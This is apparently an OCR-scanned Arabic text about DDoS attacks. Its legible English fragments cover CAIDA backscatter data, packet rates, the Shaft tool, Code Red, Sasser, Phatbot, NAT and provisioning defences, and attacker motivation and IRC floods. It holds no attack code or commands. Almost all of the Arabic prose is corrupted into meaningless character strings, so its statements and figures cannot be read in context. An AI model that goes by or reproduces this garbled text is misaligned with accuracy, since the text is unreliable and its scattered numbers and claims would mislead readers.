Jalaj (jpte-V ^U^alaiJI (Patches) CjUj^>^1 jli t*Uil t(^lSaj^aJl li^J ^a. j^ ^^>*J Q*) <■ axjJall Jallj IgJ (JjjJ ^jSI Sjf^Vl 

4-uIa ^^a-Lua 
(jl lLu^. tAijjuJlj ^LaJSVl (JJJ^C Jc 'DoS J ^J-^*-* JJ^ ^— ^ cjlxjjlii^ I Lai£ tLjajl .AcLaiJ V AS ' *a» > 

?(DDOS: HYPE OR REALITY) ? t 4J*j <> ^UjaJI 

?DoS 

j£i ^jj i o J t Jj^ill tilli Jj CjLo^JI oIa (Jj > q'i tiljljjaj .<JA<u3l CjLo^JI ^j-d ^Acj t J-gJI ^jJa jl! < - ^illl j * jjoj 

J J ^ J^' DDoS (j* AA JJ3U*1\ Cj^I jaJl ^ AjAxJI Jj AsLjaVL .Jj^aAll liA J Jjj^aliSlI 

,<KjuLa1I CIdjj jll CjUl^JI £>i& Sj^j (jc- 4_ia1c i _ib.nl tilUfc 6<aLa-> ^11 

?(HOW COMMON ARE DDOS ATTACKS) <> OUjaJI ^ j±* U 

IgiV I jlij a jJI cjKjui ^ ajUU ajuU^i DDoS J\ ajj^JI djLajljJI ^ j^il dii^. .Ajill c-lojUj V DDoS 

{survey techniques) CjIusj n > n cjUJiiJI j .4-kLuj ^1 ^ j^JI ^^jVI J ljl^3 ^ f^!^ 

( . u£ a jjj^j 4_SiL<iVI .^-J u^J^ JJ^^^ J^'^ (i j "Shjj^*^^ CjLo^JI * alia a ^1 jjl jLaajl <jalii3l D^Jaill ( ; b 
i 2004 j^j^ J .<-<Jai<i 500 ^j^J ^ <-M* Jj bUloil tA^jjojlaJI j^JI J ^ jiaJI Jl jAiill Cjrqj'q\MI 

CjI c Aj]l£j] ^Lxli JU^.j ^jl^ _*L<i^JI c ^ j^^l (jia^xjll ^ ^ jTi ^JLg ^jLuA I jjlc (jjill ^jjSjLouJI (jji^k ^j-<i L* 

Ac j^a L. CjIa^A j (DDoS) ^ jj - ^^ A-oAiJl L-laL^ CjUl^A (j-lJ (j^flJ V Cjlc^UalajVl J 4^q,^1ui^1 t ■ nil uiVl 

.^j^-VI (j-sajU^iJI j DDoS i— ^ ojjj j Jc CjULiJI 
.MichNet ISP ^^Jl J ^s^jill aL^I J^ jiS ^ Uj^> <«^U ^> Farnam Jahanian 6 J° 

jl<i Jc Sjj laj a j Ia^. AjuLuj DDoS ^jl Jj j;!^ jll CjULnl! ^a^Ij Jahanian c3^j^ ^ t<cLuJ! jIa^ Jc ,<Sja3I 

,^cjlli3l (j^asu 4_ilasu3 ^jiajc. tilliA ttilli j Jahanian 2^^-" ^ j 
CAIDA .^j^V^ ls* DDoS Ajt-iila j jl uml J ja. CjUj jls^xJI ^jc JVa1uj!)1! A-ualll <JjLujj t fllla a ^jc ^jjia-LJI ^ ^ac 

J^ 4 ({^/i^ Cooperative Association for Internet Data Analysis} ^jj^Vl ^UUj JJa^l 4_ijjUj3l Aj**aJ!) 
t>» 4^000 2001 ^ J (^bjjl aj^Ij saaI ajSI^JI Sjla ^uHill jjj^j clip, .backscatter c^-^ ^.^">»n 

.dijj^VI ^ J^ ^ jf-jVl J DDoS 
000 * CAIDA 4^ Jl J Jj j^i l^jl J^ U j^i ^ Jahanian gftti .^IjJI c> JSi a£U3U ^ CAIDA ^ jl «uU s^J 

.2001 ^ iio l^jjJi r^n^l DDoS uL^a J\ ^yJ CjUUj ji& tcilli J^ s .DDoS 
CjU^a ^ix^ jl Jj Jahanian j CAIDA l^-^ Jll ^Vl ^>JI ^ 6 ^ DDoS ^j 

J (JSajj Cj^I jaJl jxi AjAslSI jl (jlaxJl (J^Sj J ,QJJ> ^ dil Jil (<JH<J! cJ^f^ J^ t^J^ixJl diVl) IjUnl o jjir > ^> L_fllAAl AjJa (3^^ DDoS 
( ■ UjujJ ^Jl (j^J / Uo^l Jc ^ j3 ^IHLujI (^\ Jj <Jj^ jlill Jc lAa. A J^-J (j* ^C. Jl Jc 4<jIaxJ! ^ - a3U jj^f \ 

oAa! <jLaJLuj| ^1 JIjj Vj -!ajlj Jc- ^AaJLaixJI jSjj UiAjc .^5^)^.1 a£jjoi J Jlk tilLiA q\ laj] DDoS r* ^ jj 1 
Jc- 64^1x11 J ^L^j jl (J^Lulxi <ilU& ^ji jl J jxjuLq ^ILJI ^jj ^clILudj (jl ^^.j>JI (j* 4(jjli}| j» ^SjSa 

^| l^S^^lj J jj^ c> ^ DDoS CjVUJI c> jiS J 4 1 2£aj .DDoS ^ i> JW (^LkJI 

^ ^Ijloj ±*te> i^IUa tVjl ?4 K mi « U jjlu jl Jll 4_p^l ls^-a La 'DDoS ^-jL^JI (j* aja*]| ciiSa^V J^> <j£3 lil 
^ji t^Lijliill .^LalgJI ^1 J *L<»^JI lP^j ^ cs-^ cr^^ DDoS ^ ^j^j ^jj cjLg^JI jl j-aluil (j>* s jjL3l cj^I j^JI 

ASlIjI A Ltij (jl (J^-gj La (JjjJj 4<J ^aLill ^Ig-xJl ^1 jl La li& (jV S^jJj^aSj S^ii-k^a (JJ^J La S^lc S^)Jj^as3lj D^ii-j^all CjLa^gJl (jl 
A ^ t ^ j]| (jxj £A^J (jj-a^lg-xJl ^US > nj (j£-GJj .^OjuUi ^)JC. (J^j <J^« LaJj jl tdjlcLuJ JzJb ^AluiJ (jl (j^-GJ DDoS 

.Ajjj-g^j (jlaljC-V JjojI j (jUaj Jc Ifrxl.V^ UhI ^jjI J^l ^iUl j& Jii La dlli j AA JJ*-* <J*-^L djUj^J 

DDOS f*» 

J jl Ia^J jh ^jki Jll ^^>^ J 4-ui\j& (J^-gj ^ j^-ll ^ 3^ DDoS ^ l>^^ * ^>^l 

.DoS <*-JjLj ^ jll CAjoiI jJI (J^asu 4^joj (JjjUj (jl L^ajl (j^J _^ j^^^ ^ 4^jLauJ! gl\ 

4.5 j 4999 flc ^ f ^ jj^il u^ 1 ^ Shaft attack tool sbVl ^ V^^i ^l^V 1 J^ 31 
MultiRouter Traffic Grapher (MRTG) .^jll c> 100 Jlj^ t> <^ ^^IjJ^j^ ^1^1 ^ c^U^ 
J| j^kj Cjj^a S^jl jll jj^all ^^>^ j^-^ cJ^I 4 V^(pHidti j>JI (j-<i ^-jji^ Jc elm dii^. 2001 j^-a ^^-S*^ ^ u^^^ 

. jj^Sj (JSI Jc JjSJ dlaJ ^jailo cJ^^ (J^^^^ CjlAsLxi ^jl Jl tilli ^^.jjj .^1531 J Clul ab^o 25 

Jl Jj^a!i ciiLajuj Jl jIojVI Uecomm ^5^* r* 4 C5 jJaL^ll J 4_x_jujI j Cj!>L^a j ^ Cj^kjl jll DDoS jLl^a 
.pps 200^000 J\ 100*000 c> J£ Ji; <2002 ^ <^ ^J^ 1 DNS H ( > c> ^ cr 131 ^1 ^ .pps 600*000 
cjUbi j ^ j^Ji j ^l^ SI cJUbi dii^ 42003 ^ J (Al-Jazeera attack) s jj>JI ^Ua J^ ^ j^JI Jl* ^cjVUJI o^s? 

(jli JUlUj 66JjJjJa3l Aic J^JI 6 j5 *^Uj J^JUdJ ^ j£ <LJ (jj^^l A\ (jl Jc (J^J li^ . Jjj-oll ^^>^- ^ (J-dlxjll Jc 6J^3l (jjixalAxJl 
(j-G ^jAslSI jll J .^3jJ (jl (j£-<uJl (jxi (_^i3l > <a3VI ^aJl (j* jj£l L_J jlla^ La ^.1^>JI <J ^>*jaiJ ^ j^^l JJ^la-a u^M* 

dlS j J ^ Lq J£ ^jJafl ^AaJ (illi j ^^Jl <iajoj jILq ^ <L^il<Jl CjI^JjoJI (j-o <C j-o^q du^Jjoal ^J^jll *L^. j Jc CjUl^JI 
(j£-dJ J-g ^xilajul ^-!aJJ ^ t * 0 /^*^ ^13^ (j-a V^J ^lj ( --^J J ^^jl j-d <j£ ^I^JjujI J L_flljjujVI l^kj>» (jj-^l^xJl (jxi J;J^I ^i*J 

jll L^l jlLoal <^l J ^a j^-I! Jc ialLaJI 

Jl ^jjj ^ ^ill ^31 ^j^3l o^*-? olc^l .CjU^JI jj^j Liajl CAIDA 1 <p* v^J Jll backscatter ^ 

q fl>^JI djlcli^j 4<^^pJl ^ jjj 4t * a ^^ ^Ij^ (^C- bL^Jcl . jS&l jl ppS 350 (j^ L . L "^^ V Jll CIjIa^JI t L^aJ 6(jjj^i3l 

Jc^ .6^.1 jll AjjIjII J ^a jaJI (j^ lJVVI CjUx CAIDA IplTnJ jj£I .<^^kj| (jUj^J Ual£ JjSj U ^aJl liA j 

Jl U cits SCO ^LiL (jl CAIDA ^ ^ *2003 ^ SCO ^ TCP SYN Flood J 4 

I j^IS .d jj^ J ^Loj 32 J^ ^ j^a J ^aj^JI t> uj^ 700 c> ^ L» ^ J>»Uj3I j 6^1 j ^ pps 50*000 

t L^aj 4jjLoxi 66LaJl J£ J CljjljVI Jc JjJ-a3! (j^ / dylxJx 20 (j -0 Li" pps 50*000 6 JJ^ 3 ^ J^x-^l L_jLud^J 

."(^ / c^U^ 45 Jl^) DS3 ^ Sj^ 

(jxi ^jJaJJj .LA Jl tgJ JL3 Jjll^J L-Jxj^a l J^ L— ilg.1 > ^i^VI (jU 4^a j^A J liljLujj Jll CjVVI Jl Jaill (jxi 

2*200 c> c> DDoS f jl 4 1999 ^ J J jVI DDoS CjL^ c> yr^ 6 ^ <«^L^ 

.IP SpOOfing ^Vi"Q ^a J^JI (jV ^^Vl ^Jl Ai^SLxi ^aJ ^3 .jaflS liJ j^. JVI J^l < * Q J^ 4-^LojI ^al^klajU A aW)\ 

u^-a DDoS ^ Cik^ jl jll IP (jjjLc; ^L^a^l 4 IP Spoofing JL^I u-* ^^^^ J^l CjL^JI (jiasu 

.4_nsLxJl S*xl\ ^ jL^ cJ^^ ^-^a jJ A jjuj l^-jli 

^ ^ .pps 679*000 uj^ J CAIDA e j^JI Ja^ j£I jaS .ia j^LJI (> cjVVI ^ J^ JVil,^U >l ^ <^ 
.a£jJo31j JL^ajVI j 4Aj j£^<JI ^JIslaII j <c jjoj tilli J Iaj i J*\ jc Sac Jc aaIsu Sa^.1 jll 3_ijLi3l J <UV1 IaaI jj (jl (j^j Jll ^3^1 
^ <j| lUajjal j] j^ .^j^ C5 A-flSV mj^' J^- pps 20*000 ^ *^j^VI J] A^Lill J c^U^ 10 Cj^a j ^ cjVVI 

^ .^Ua ciiVVI (>« 40 30 iXV! J^ ajV (jl^ 46 j$A.Vt 6^ c> ^ j>^^ JjS (j-d CAIDA <iSa^V Aa ^ill j ^ jj£I Mku 

t^iJa jjoj cjli CijjjjVI CjILiUjjI I^jJ 6j^Vl c> 90 J^Vl Jc^ ajV jl£ 46^1 ojj^aJI DNS ^ 

^!>l£ jll ^ia^. duA^jjail lil 6(JHa3I ^J-ijjuo Jc .CjVaslaII (jj'q^M ^ Lo j;i^l ^LL^j <jla j£ CjWI ^1,^1 ml <JL^. J (jj^jm j 
Jjujjj dii^. (Reflected attacks) <^x j u o!\ cjU^JI J _^IS jVI ^ jjj ^ jVI J^ j& ^ I^a J A- ^vim^ l lW J*^t 

^J-s > ^aJ Jl (_£-^JJ lA JJ^J <jJl J 6^JIsl!I e-L^Jl <J <C j^)juuJI ^1 (j-a 1^ (J- 0 (J' 1 ^* n (jl! j f ^3^" & ^ 

Jc I jjlS Jl jj V jl£ u^j i> ^ ^ Jc- futuresite.register.com ^ ^ 

.AjauJaJI j^V ^1511 J ciaj jjAft 90-60 ^ 

.DDoS ? J j 31 J^ cl^ 1 * j* 1 ' JpL-oj J 

Ifral.Wimt j Asu (jc t^j^Vt 6J^Vl ^Viml 1$jU tiilli (j* V^j jS jll Aj jj j] AjLi c*Ui jV 'DDoS (J^V 

ttilli j .DDoS ^^g^ ojjjn^ (j-a A^j (J-dlx]| li& (jli t^jjoJl s-l^ill t . illaJJ A )-* > ^> A_iLoC Aisu jig-?* Jc- A_x* jLauJl lij ,^ j^^l (jjuJ 

. DDoS^W^ ti^V U-^ ^ M1 1 J^ j jSI j^h u^-^l J AlUi aJUJI djluiill ajj^JI £sl&\ 

^ 9.5 ^W-^ i qjhvil l^l^kiojlj I^L^j MSBlast cleanup jj^-* ^ ^-^1 

.Uj^juS aS jja^SI jjjjU^I s ^ uj^ 1 c^'j^ c> M ^ '2004 Jjjj^ 2003 u > l ^ M1 ^ ^ c> s 
Jaj|^)ll ^1 ^>lajl ajU^xJI Sasscr 2 cJj^- 1 dulS U^Jl 2004 ^ j^jj^^ t * >i<< ^-' 

http://www.securityfocus.com/news/8573 : J^i' 
.< \u'^a 400^000 c> <*u^ ^Wiil ^j.n cj^a^ aS ^1 l^sli jjjli^l 

U^^ Phatbot. Phatbot c5 j^? <^ ^L>^ IP ojj^ uj^ 2 c^j 1 Ij^li l^ljA ^ a£^J! J jl^ - 

.<j j^Vl cj^U c> 'MyDoom- and Bagel u^^ 1 ^^ u ^J > ?n ^ ^l^J ^1 

auto-rooters J 'automated infection toolkits ti^ s^'j^' 6 ^ i> s^l^V A^aj^ ^ ^1 djVVI 

^Jc. (J jj^^Jl jl CjV jUj ^A* 5 Ajj^l jail ^jli 4^jja£jjJ A_xJail ^^ic ^Uaill (Jjjjabd L-jLud^J ^jojI^ TOOt ^ laJLu^l AsU^ 

L_a*_jJa3! Jalij (J^ujjjI 1 lil Lujuj Vj i A L« - tall CjVI f^J' JJ^* 3 ^ ^^■^ UJ^ ^ '("Ajtij^ Cj| jUldl 

.(patches) cj U^^N ^ja jc^ JS1 ^ ^1 Ijja^ Aij^iUI 
A^xijJI a! A^uaij ^ l^ift c_iL^ajj c axjjal) Jallj djli diai n ^Ujj ?ciujS3V( sa Ultimate in automation 

/*iIAja3I Aj Aj^aUJ) 

^ j^a iiiiil (Code Red) *1><^J1 ojii^l a j£ ^^>^>i ^3 c JIU! JjUjoj .DDoS f m^j^ ^ j^*^^ (worm) 

c> 250'000 c> jj^I <jl->-al <^ (Code Red) Sji^JI jjS c^aJ .(jj*- IP Jiyc ^S*JI DDoS 

Sasser .oVVl 6- 500'000 cUy U (Corfe /ferf//) II *l j-aJI s j^JI ^> ji^l' 

^DDOS ^lA^i 4^ajP ^ 

< aj< (jAill (^jU jl JIjjoJ! jli tCijjijyi ^al lP 3 *^ Iaja^j DDoS eft <J^ t " 1 ^ 

jl ^j^dj DDoS f .DDoS ^ j?^ ^ o lijiA tSbli tdijliVI a£l^ ^1*3 ^ ^ n t ^ li! ajI ^a 3 k^ull 4j^VI 

CjUiAk ^^aLg j 6 6 jjt > .oil j DjjiJ^ll CjI^jjoJI .A^^li (jj^J (jl ^^.^<JI (j-<^ tAjli^ll Aj3 Iaj ^ j3 ^ j^A lilj cJP q\ jic ^\ c V^lun 

LaK .DDoS r* J ^ ♦J^" ^ UJ^ ^ U^^^ ^^J^ L>^ J^Vl J^-J tCjl^JjaJl Jc AxUSU A^ J^JI djLaUuJ^Jlj dljjljVI 

.ALjL Sjja ikL DDoS f J?g^ C5^^ JJ^-^ ^' J t^ouaj^Jl J Ciijl^U *\ Ikl^l 

A-iLaixj3l ^^>^ J^ ajIa^JI jl£juj| <J£joi (_^l jl 6(_^jU jIa^JI 'NAT (jjAi^ ^Ijj (j >i ^j ^jW^- ^j 

jj^Jl L_ fljjj jl o^lcl 4 j£ aJ jJalxJl a^I g all .IjJaJ DDoS (>< ^ AjJajC Jl JJ V (jj^J ^ ttilli Jj 6jjaiLlx» l^-l^ jJ ^aJJ (jl 

jl^. jl AjLo^JI jlA^. 6 NAT (jj'Vu in J^j Aiajoal A^Akll (jia3^)3 tiLia^su jJujU>» J» ^ (j^al^Jl ftAflC- Jl L-lAAj (jl ( . LaJ jll 

Ail£ .a£jj^3I Jl ajIj^ Ja*j ajU^JI jIa^ ajAj < Luiax (Network Address Translation) NAT. 4£jj^3I aL^j j] a^jjII 
l! oJ» ^ ■^^> a3 ^ ^ J j^ 3 ^ iiLujI ^jj J^^j Ia jAj^-g (jjjUc l^Jj NAT l5^^ 4£jjoJI (iljii jll ^3^^ 
clA^ NAT /<^i J^b Jig a 1] L-bujliJi jl jixJ! NAT <y>* u' JI^jIujI ^jj f J^l ^^l 

NAT^O* <j' L5 > J O^^J^^ .Vs nnrtti £>l jj ^ilt \]^> jll (jl ji*Jl ^^^IkUl 1 g KjA ^li^-V aSjJJI 

(J^axJ £)) (jj^> ^ a J^Jl li& (j-<* cilljl aaJ ^ajflJ L_fl jjoj SjjjjJalb (jjdJ A^JjuJI Sjblj (j-aVI ^aUaj tULbuj liu^U Lo£ 6tiI3i ^^ic 

/ajJJ^ll ClAjLjajill CA a^frj AjJajC Jl Jj V <^1*3 j-a ^ flxjJall Jatfij Clil A-LaJjoi CjI *s!>L^VI 

djULja^ CjLa^a (j>» ^jAxJI (j-a ciljjl ^ Sjsl jll ^Ikjl ftj^S cJ^ 1 (jg& ^ (He uvy provisioning) A V° *^ 1 ^ &1I 

cjVI ^lg-«JI ^ li] < jMI c jSai l^^j ^1 SjjSll aj*31 j a_l<£ ^1 .t*L <j^aUJl AjL^Ji ji-oj V jSl j <DDoS 

.<jjiU> JSl la^A ^ILcaJ j DDoS lP 3 ^*^ J <^ I Aj ^USII «j ^L^l <t*lb x-aj .ciiJa a_* ^» - ^ A_ial£ 

^ jjjjl jl Ia£a ^1 j jjill <jj^al jail JjS ^ ^ j^JI jIsuIoj! ^Loij (Heavy provisioning) aL£j3I Cjh^^vill 

jUojVI (jc- jjll .L^xjJall Jalaj A-ajtl3l diU^Jl £Ojj I^jV ^LuiJ c flg > Sail Jatfj (jplcl .^ijj^aJ dl^J Jj£ jll CjVI 

Jjj^ilill oi^ ^jjjabj jjoj ,*L<i^Jl u^a ^ y*Jt> t * a J°^*^ Igjbjj (j-a 4Jbi dibL^jjaa! biajlj jjjxj] lAiL^jV 4jbr> 

,<Lbjj <J jj^a 

£a j^-jj a x-lfla ^jc. (jjiaLalAAll Ai^x-d ^^^J l^Jt-d J^IxjII L-Jau gall ^ ^aJ ^^jll (_^^)J^3l dljjijyi ^1 j>» (^^ic 6 jjbll Cjb^gJ! (J^asu 

(jp» ^lak ^ uj^ ^-f^ 1 A_k^LkJI ^jl (j>» CijjljVl jii jl j-gIujI (^ic Axusu el n£ bj .aJc ^j^l dja jll (j>» c«y^l 

(j>» ^^C lllaJL ^ajL 6^lc (jU 4^ DDoS ^ ^-H^J^ till ( ■ UjujJ ^3 DDoS (j-d Ijj^aJC tilb^ 

<jj (jj£j V ^blb ^ill ^ ^aUJI ^jl U j£ tiljU^j jjoj tiljla Jl j^Vl (jjud^l ^ i\ aqjii tiljl^ jl£ bli .CjVVI 

(jj£j ^3 (iL <j^al_iJl Ajjji^Jl CjbbJl jl c^Lq j^A ^ jl jjJaVI (J^axJ (jc bjj^- V jjjuo-q ciLiiij i Jl j^VI I jjoj I ^ ,till<i <j^L-^q 

.(j^^>^^l cf^* DDoS i— ibi^A f.bl (_3^^>ia (jc J jj^^JI ^ (jj^^l ^ <^l A^jS t ** iqq^ ^ jj (_^i3l ^.l^xJl <Jj3 (j-d <ilb jl Ai jj^-<* 

AjJajC jj£I ^il jlfraJI (jl (^^-ixj bA j tjj^ jll CjVI (j-« ^ CjSj ^1 (j-d (jjiijjJaxJl (j>» j^S ^)j£l lil^j] 1 > J jj£I (jj>i^)^xJl 

<C5 ^,jLk ^jia J^ (j^ < ^i c ' £^blLoj^U 



DDoSj DoS ©j^ 10.3 



(^jl! CjI^.VI (jc !)ljJaa 1 1 ^ * j o - ^^bx»j Cijjlj^U ^ji^jjbll L_ij| j^JI ^1 bUloal t^^JI (j>» (jUi^pJI (jjjaUj l_a jjoj J- gaall b^ 

.(jj^^l ^ ^11 j CljjljVI ^ (j-« J^ J^l l^al J jJl 'W^-J^ 1 J ^-^J^V^ J -0 *^J^^^ DDoS ^bi^A ^1 dj^l 

(Motivation) gil.

VI^jujI i^jj (jl (j^j ^Ijj^II b^ ,^Ijj^3Ij L_a!)tkj! ^ j^-j (j-« ^ tlx^ (JjjUII (j>» CjIc a ^^ic J jj^^JI Aic 4Jl (jLudjVI Ajt-nJa (j^ 

laJ ^1 ^Jl ~\ Iklual 6 

Jsc^J jUJl (jlj^- J^^l ( ; ^ 4 ^ (j^akjaJ CjljUaVI (J^aik ;<il3i (j-d I jjujI JL^cI jl AjjouIU 4i£-<uJl jUl^VI dil > ^ - gaS) 

fiiA J^ tCj^J Lo£ , JJ^JI AJSjCj L_lStjaJl t . UjujJ Uui ^jl JJaJl ^ jl <-dlc 4 ^1 UJ ^ JUJl (j>» A-dJ^. 'J-^l (j^ cJ^^ ^Ijbjuall 

.AjjJaUll 4Jl<»Vl ^ t JSjSI Jjb- j c> u^j^^ j 'DDoS c> f^^^ Aj^UJI JliuiVl ^ULaVl 

J jl£ Usenet (newsgroups) jW^I .^Ij^^ ^-^1 ^f^ 3 ! t^jAUa ^Ui^l (jt£-a£ djjjjVI aj^x^ c-iW^I U£ 

S-Ljacl (jjj p^(gMl ^xj ^^(glll (j-a Aj^jIaII diljl j^Jb AliLd AloiLoi ^ilkjJ (jl (j£-<uJl (j-d j AjLuHaH ^31 > dib (JjjUII x-<^j ^^^1 
^jb^a ^^^^jj (j?l ^(JIjjuj (JLujJ tLa (j^akjuj ^jujI be 1 Vi > 0 ^ tAjjJaJ^^J ClA^J^j aJJ ^V^VIj L_jlAi3b ^j^J ^ailalb ^)t_>.7ij uj jl _A£. j^^ aII 

-( ^jjjj^3yi ^^>^l jl jW^*^l ^ AjbL^xJl iaUa^Jlj A A^lLa L_Jj^)^. IAaC ( . UjujJJ (jl (j^xuJl (j>i ^^Ij ^ J^ 3 J-^l (JC- ^J^- 

(jl < . la>Jj (J-^l ^^>^ dlJl" "jb^ I jSSjl" C5^JJ^V^ ^^)^^ cJ^l^J £y* 'dbxi Jj tdiljjaic. ( . lJjujj (jl (j^J (j^akjaJl 



a j£j (jl Ajjjoj A^j^J J>^i^J tdlVl^Jl (J^axJ ^ Ac j^t- a (j^ (j^*^ ui ^)^^ (j^^ V "tAc g1\ d^A <-^^)jj 



(Jjjja jc (J^.I^JJ La Ic ^illj DoS L)^ (Jajuj ^ I— U laJI j^A^J (J^-uiJ <C j ^ all <-^^Aj ^I^jujVI S-l-*-^ (JjAjII 

_Lq £(^±1 ^aLaJI j-a jj jjj^^l ^ 



ijljixj Phillips j Suler ^ JJ> ^ 

"77/£ Bad Boys of Cyberspace: Deviant Behavior in Online Multimedia Communities and Strategies for Managing " 
http://users.rider.edu/-suler/psycyber/badboys.html t> £^VI Jllj 1998 ^ 

LaLaJ 4 qVl^ a <LjaJ jUa*.VI (J^a*J J L-flj > <aJJ jl j£-<uJl j-a <jjjU3I jl cTnj L_ .dljjljVI Jc ^Ld^JjaixJl jc <jujIj^ Clq^ jll j 
jjjuoij ^jaij Jfl tgij t*1J«s m <^. j] lg_a. j (jjjUll £A <Jcli!i3l Aic La (Jjj^C Jc dljjljVl J <J-gIxj31 ,AjC i4jc! al^l JJC <L JaJ LJlc j 

l— lAaJL jl£ jl j-a L-bJasJ! J ^ 1> gaJ jl j£\*Jj . JjLiuJl jl (Jj> gal J| jjj£iL jl ^ g 9 ^JaaJl jjsilll I^jV ^UjujVI 

a La jc t ftjuj^ll ^a^C .^£1 ft j^J (JclijJ ^ 4ilj L— l^aJjj c£^l (j^akjuJl AjjJ 

_4_L^aJ Ja-aJ Vj ^)JC I^jU jJ^)i».VI j-LaAaJLud^l (Jj-aJ ^jll jj>^)Jl jl jj^ ^"^JJ j Jj^t_ui3l 

jl j£-aJ J^lj tA-jljj^Jl L-fl^sJl <Jj>» LaLaJ jj^J djjljVI <Sjjuj Jc <juj^j^3l L_ fljC Jl jj Jaii ^jjjUII (J^axJ jl Cilia a 4 a * Uo^i 

<j^aLa Ai^c. tgJ ^Li^jj Jill <j£jjI Jc- ^j'^Vj A-^V uj^^ os^^y* uj^*-^ ^ f^^j ^^-^-^1 J^ (>< ^ 

^jjj^itill ^j-<i ^JlxJI Jlkj La£ UiLdj 6^ jll ^j-<i jjj ^cilli J £ix^J! jj ^>^-VI ^llxJI L— Lia Uiia j jii jjj^ti lS^*-^ ^ ^i£-<»jj 

Jl (jjLa^Sl! ^j^i^^l ^ L^flj Ullc. j ^Ijj^all /Ml Qli ^.JJ <jl ^aJ Cilia t^^UJl ^aJUJl J li^ (JjJ^C Jc .lU*^I (JC- Aic 

4_a. jl ^5 jjoj V .A-nx>Jl L_fll Ja!>l! J jjujVI (jj>Hua3l JxilU Jill laJ > o jll a£jjoi ^ ^jl^-o ^1 jj^ll ia^U dljjljyi J 4(jj<vV^I (j^^^l 

^^UJI 4-jj^3l (jjli^JI li^ ,L_fljj^i3l <-iaj£ J ^A^Lujjy Ia^L<» JSU 4_jjisLxJlj 4_jS!>L2t.VI JaVlj l (j uj <J£ ^U»l A-uiLuij ^jjILJI 

Jill dljjjjV I ^jl jij iaSS jj aJ^ o ^jli ttilli ^j-d .djjijVI A£jjoi J CjVlj^iVI jau (jj>u^J V c^-r*-^ J*^\ Uj/^ ^ (j^^JjaixJl 

(Jj - gal 9j3 gailll Ai^sLxJl (illj U^ 1 ^^ ^^J^ .^—^J^V^ ^.^J 1 CjLd^iJl jl 4_ijjjjSUVI SjlaCil! JLd j3 jJJ 

jj J ja.^ Jl Cj^I Jll 5Jaljl| ^ d^A .oji^ A LLiiJ IjjT.uij jjill (jJjiJbll CjUi^kll Ajllsti J^J ^ » n > » V 4_ilc ^-IlicVI clA^ <SjJo1I 

.^Ul J\ DDoS 

t4_joi^j^3l L_fljC. j jlikVl CjIc j-^awd (JiLd JIj^jVI djLiJT ^ dljjljVI J A-d.liJl l-la^ CjLa^A CllSaJJjl ^3 ( . ill *\\ J t^jjnnti j-o Jc 

^jlj L_iiij!i3l jLa. J jLi (jl (j^j (JjLoj^)3I ^jli tl^ <uLuii <J> .^^j LdAjc j jjii^lVI ^^>JI > ^ <J> ^n^j . Jj^aJI cjS jll J Aj^L^g c^IUa 
^j£-<»j t J jjli^3VI -^>J1 j' ^ j^ 3 J jW^-*^^ cijlc ^ JiLd tdijjljVI J (j-<il jl<i j;i*JI J^^VI djLill .^JUI ^ ^ 

> nj La Aa. Jl (j£-<»Jj JjoiU^ UJ-^ *^ 6 ^ J>(S^ '^3^ L^^J ^ CjliLjajil! jl Au^alll JjS ^j-d \ folic j^(g\l 

^UiVI Jc J»^j V ^Ifo^l Jl^Wj < jjc ^ ^ JL^iVI djUiT jl j . jj^UII Jja (> l^j^ Jxixj]! 

,^jji3l Lja^)3l j3 jj V t^^kl ^Li^lj 4<J^-<» jjc JJJ>JI ^^>^ ^ dA£djoi]| jl CjLdlLJl JiaxJ t . ujujj ^j]| 4^»^aJ| L-JLa^a djLftakA 

(JjJafll lS^*^ lS-**^ ^->^1 ^^1 jc Lja^)ll j AJlxill j-d Ajjj tl'qjui^ ^.^foi ^ 4 \a > >i ^ lilj t^Uaill Jc JjoiU^ lS^*^ J^jH 

# L_JJj3I ^^La. j ^ij^l<Jl jJJ dj^lclilill j-d *UjJa <LaAjuj jxuJali jll JjjaJl ^JJjll iaLaU jl <juj^j^3l (Jio 6 j-dl jlxJl JIj^jVI lS^^ J J^ 

^j^i cjli j jjjS^I ^jjj Vjl lUjj ^ l^jli tlia. ^jaCil tNotARealSiteForPuppies.com pI^j) ^' J «Jl^ll lW^ J^ 

Jc Jj^aaJ Ja» JallJ "CjIcLuj SAaI IqU a AixaJ tiL ^j^alaJl L_LjJI £fl ^ ikl Jl L_iAli Ulj !(JjjU3I <!Ha. dljl" | Jc ^aJJ jllj 

.<J dj^Cj jll ja.foSl Jjill Jc )AJJ ^aJ ^(jjjjal^ L-jLuli. ^a».jVI J^-) <!LaJj3l J^J^ (5^^ L_)LaiaJ! jC ISP ^ ^ ^jll 

jdj jaj) "Timeout connecting to server" jjjlli (j jjj t J**j ^jjjII ^i^a ciul£ lil U <i JiaJj 

Usenet J jW^^' (>» ^(IRC) dujjjyi j^c ^^j^ll a^^j jjc l-jUVi j-aljiall JL-a2VI 

Jc jJujU-<» <J^-^ J^J^ ^ ^ * L>^ . JjujL>JI J^Lill 11a < . UjudJ <-<i^iJl uaA CA <^^J jjjJa^suj Lq Ullc t4_j^j^)Jl ^ajl j^3lj 

CjLaa^Jl £>i& ^foij jl ^-<JI jxi .lg-La£\j IRC 4£l±ui (JjIaxJ Uiajl jS\3 j ^IRC L - J ^ L>^ J J^^^ 4 ♦ 1 » M1 >> ^AaJLaLQ 

pUjojVI ^SL J jt s^jJI fiL ia^a Jjli^ <JUi CjUiill j CjI j^Vl jV (IRC ^ ^ v^»»n V jl J^) 

Jl ^ J (DNS) c^J^^ 
<.v>^ CjU^a .1990 J J 'lAu^ <c>VI 9>\j^ c> 4i jjx-Q IRC J^ J jVl CjU^JI 

.(dUS cilLj ^ill <> jLa^ jl^a t^t) IRC ^1 Jl <TCP RST Flood J& Jllj <4-^l 

(j-a ^^cjjoJI tillLall ^ j > nVi (J) Ala 64_juj^j^3l djl jja (j-a jj£I jl ^.1 j tilLoj ^jj ^ni Aaa taUall aifc J ^qn^l Aia* jll 4i j£ tA^ul) ^AaJLoiall 
Aj j-a Jj A3 (_£All ^Vl '4_g_^.l f^-^ J^*-^ J OSP' L-jLau> ^nVI i^^] t>^y* CjI^JjoJI ^ajJaJJ LaAjc .4jK <^l a£jjoJI 

Jc 4jJJJ*.| <J^ J^ 5Jl*i 4jjjal j 64_ju1,JjA3I dj| jjS (j-G ^a£J L_Ua.J^ J^*-^ (JJyiA^JjulxJl <Ul jV ^^1 (jUaill 4jLjoll J CjLttaA Ci^A^JjojI .^ataliVl (J* 

m Cj& jll lilli J 4jl-gIj> J IRC 15^-*^ U ^ T ^ J^^l ^-fl^>*J Clljl£ ,S jl jill 

